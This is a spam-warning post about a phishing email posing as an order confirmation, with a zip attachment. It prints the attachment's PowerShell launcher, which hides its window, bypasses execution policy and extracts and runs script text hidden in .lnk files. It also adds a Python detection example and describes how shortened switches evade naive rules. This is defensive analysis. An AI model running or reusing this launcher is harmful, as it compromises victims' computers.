Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent
This email has been spotted this week:
From: [email protected]
Sent: Monday, July 30, 2018 10:52 PM
To: Recipient
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent
Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.
WOMEN | MEN | ACCESSORIES | HOME DECOR | GADGETS
Hi Your Name,
Great news! Your order is now confirmed. We will email you again when your items ship. Thanks for shopping with us!
This email was sent from a notification-only address that cannot accept incoming emails. Please do not reply to this message. If you have any questions or concerns, please contact us
This email downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used for orders anyway, but this website, https://johanwolf.com, obviously has a valid certificate and is being misused by someone. The website itself just seems to forward to Office365 support for some reason.
If you unzip the file that is provided, you see an image, which presumably pretends to be a real company, and a file which runs a script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
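The command changes to the Documents folder, uses findstr to search the .lnk files in the folder above it and its subfolders for the marker string bremodilu, writes the matching lines to file.ps1 and then runs that file, with the execution policy bypassed and the window hidden. Running it will make serious changes to your system. Looking at this, we are not sure it would work, but we might try it on an old PC ...?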
We will let you know.
Anyway, report the sender and the website and keep vigilant!
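If you monitor process command lines, note that the shortened, mixed-case switches in the command above (-win hidDEN, -comman) slip past a rule that looks for the literal text -WindowStyle Hidden. The Python below is an added example, not part of the email or of the original post; it matches switches by prefix, and the trait names, the minimum prefixes and the benign sample line are assumptions of the example.

```python
import re
# powershell.exe accepts shortened, mixed-case switch names ("-win hidDEN",
# "-comman"), so tokens are matched as prefixes of the full name.
# full name -> shortest prefix accepted here (an assumption of this example).
SWITCHES = {"noprofile": "nop", "executionpolicy": "ex",
            "windowstyle": "w", "command": "c"}

def canonical_switch(token):
    """Return the full switch name for '-win', '/ComMan', ... or None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    name = token[1:].lower()
    for full, shortest in SWITCHES.items():
        if full.startswith(name) and name.startswith(shortest):
            return full
    return None

def findings(cmdline):
    """Return the set of suspicious traits found in one process command line."""
    tokens = cmdline.split()
    if not tokens or "powershell" not in tokens[0].lower():
        return set()
    found, script = set(), ""
    for i, tok in enumerate(tokens[1:], start=1):
        switch = canonical_switch(tok)
        value = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if switch == "noprofile":
            found.add("no_profile")
        elif switch == "executionpolicy" and value in ("bypass", "unrestricted"):
            found.add("policy_bypass")
        elif switch == "windowstyle" and value == "hidden":
            found.add("hidden_window")
        elif switch == "command":
            script = " ".join(tokens[i + 1:])   # everything after it is script text
            break
    if re.search(r"findstr\b.*\.lnk\b", script, re.I):
        found.add("reads_lnk_files")
    drop = re.search(r">\s*([\w.\\-]+\.ps1)", script, re.I)
    if drop and script.count(drop.group(1)) > 1:   # redirected to, then named again
        found.add("writes_then_runs_ps1")
    return found

def is_suspicious(cmdline):
    return {"hidden_window", "policy_bypass", "writes_then_runs_ps1"} <= findings(cmdline)

PAGE_COMMAND = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop "
                r"-executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; "
                r"findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit")
# Constructed benign command line for comparison.
BENIGN = r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"
```

Feed it the command-line field from your process-creation logs; the splitter is whitespace-only, so quoted paths containing spaces would need a proper tokenizer first.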